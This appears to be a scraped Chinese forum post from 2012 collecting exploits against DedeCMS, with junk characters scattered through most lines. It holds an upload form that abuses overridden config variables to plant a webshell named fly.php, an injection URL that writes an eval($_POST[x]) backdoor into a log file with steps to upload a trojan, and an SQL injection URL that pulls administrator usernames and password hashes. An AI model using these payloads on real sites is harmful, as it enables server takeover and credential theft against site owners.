$ [) m* z/ u9 w- w+ M<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>8 h' j1 _4 W7 a1 [" g) X4 B
<input type='hidden' name='activepath' value='/data/cache/' />4 u; |" }3 L. _! u
<input type='hidden' name='cfg_basedir' value='../../' />
& B; |% ]5 c5 E+ B3 F9 g<input type='hidden' name='cfg_imgtype' value='php' />
3 l" H( X/ o" `' h5 m<input type='hidden' name='cfg_not_allowall' value='txt' />; j2 Z$ E7 i+ l$ Y7 C3 U, I: v
<input type='hidden' name='cfg_softtype' value='php' />$ j$ ~! w( j$ T4 J# J' Y
<input type='hidden' name='cfg_mediatype' value='php' />
1 E& k0 R& t& y<input type='hidden' name='f' value='form1.enclosure' />1 i2 v% |7 Z$ |! p3 x& g' t+ Q
<input type='hidden' name='job' value='upload' />
9 Y5 n. \/ y4 H1 ~/ f1 V<input type='hidden' name='newname' value='fly.php' />' z z6 x4 A. T( w
Select U Shell <input type='file' name='uploadfile' size='25' />
* L1 @7 W+ W* C* u<input type='submit' name='sb1' value='确定' />
$ N# Q( c6 E0 Z% p l</form>! [" O2 _" M) w, q5 m( O; }) D
<br />It's just a exp for the bug of Dedecms V55...<br />
1 y; ]4 w7 j9 N0 i8 X& J r$ UNeed register_globals = on...<br />
! m7 ]8 }; u4 d: L# k* T5 QFun the game,get a webshell at /data/cache/fly.php...<br />
8 h, R/ d( L; d5 g</body>
: D4 t0 e9 r0 @</html>, I0 m' N6 I7 }5 v
# m7 b0 p' B% a4 y3 k
# k1 k' A) l4 ]
* U f9 I# v# L1 _8 v# z( H: m& @
# e3 N- Y5 \! _, V4 a
- k' i5 G( S/ Q& U
, w9 ?7 p' T2 W, v4 n2 z5 ?6 Z" p& w
) p1 g6 v7 l l& W. s
; S" e) H/ a9 R |0 j' a @6 M7 K, `; Z3 m" `0 H9 @
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
% |; w& N* _ D# H8 o利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
# m1 C* r: ]# x' a* R1. 访问网址:
3 ~1 E' f# ~, t' v* s5 x- }7 ihttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>$ U, b0 F1 A) ?; c( x ^' }
可看见错误信息
9 q4 ~+ J, [' T* b6 ~
! `0 l3 t! [' ]# {9 d
& ~4 M! r _0 f& j2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
w0 G1 U$ T* \; P Lint(3) Error: Illegal double '1024e1024' value found during parsing
! Q4 [2 r/ {0 K$ p0 wError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
6 Y8 F1 g; G3 ^2 N) @! X" ?( f0 Y+ x) p
& d4 I. y& [; X) h
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
1 D1 ]3 V' ~& b9 D5 C1 E" o& j( ~3 k4 H0 s3 T3 O
: r1 ~, D) u7 n6 m- y/ p! E. {<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
) W) j# {& N3 e- M! c0 B" B7 o
! E" Z+ y, ]2 r! G. j
按确定后的看到第2步骤的信息表示文件木马上传成功.' z" Z1 ~0 ?' b$ X8 {% {8 n8 P1 V' s
6 R. _1 w$ p4 X, Q" \1 a& X9 B- z6 O' p0 j9 v: Y
+ |6 V5 B& K& p( K3 B$ C) g
: u4 J, @7 P T' _( s$ r$ q w! F! M% `2 L
2 c! _& |+ k$ W
2 A( M" F* Q5 W5 y
; d% W5 _/ `8 ]/ d* `, p
( I P2 b$ @2 a; p2 R/ W+ p+ I4 Y8 X
3 u! Z, y$ \, R# A7 u8 k# s% S. q* Y
, C& _5 r. d& N' u
织梦(DedeCms)plus/infosearch.php 文件注入漏洞0 @: ]& s7 [( P, [" h) Z
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对